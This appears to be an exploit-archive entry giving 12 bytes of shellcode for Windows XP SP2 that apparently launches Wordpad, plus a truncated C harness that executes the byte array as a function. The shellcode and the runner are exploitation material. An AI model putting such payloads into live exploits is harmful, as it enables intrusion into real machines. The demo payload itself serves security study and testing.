id: 9843
date: 01/03/2010
title: win32/xp Pro Sp2 English "Wordpad" Shellcode
author: Aodrulez
cves: 

============================================
win32/xp Pro Sp2 English "Wordpad" Shellcode
============================================

+-------------------------------------------------+
| Windows XP Pro Sp2 English "Wordpad" Shellcode. |
+-------------------------------------------------+
 
Size         : 12 Bytes,Null Free.
Author       : Aodrulez.
 
Shellcode =   "\x68\x87\x4c\x80\x7c\xb8"
              "\x6d\x13\x86\x7c\xff\xd0"
 
+-----------------+
| Shellcodetest.c |
+-----------------+
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
char code[] = "\x68\x87\x4c\x80\x7c\xb8"
              "\x6d\x13\x86\x7c\xff\xd0";
 
 
int main(int argc, char **argv)
{
   
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();



#  0day.today [2023-03-24]  #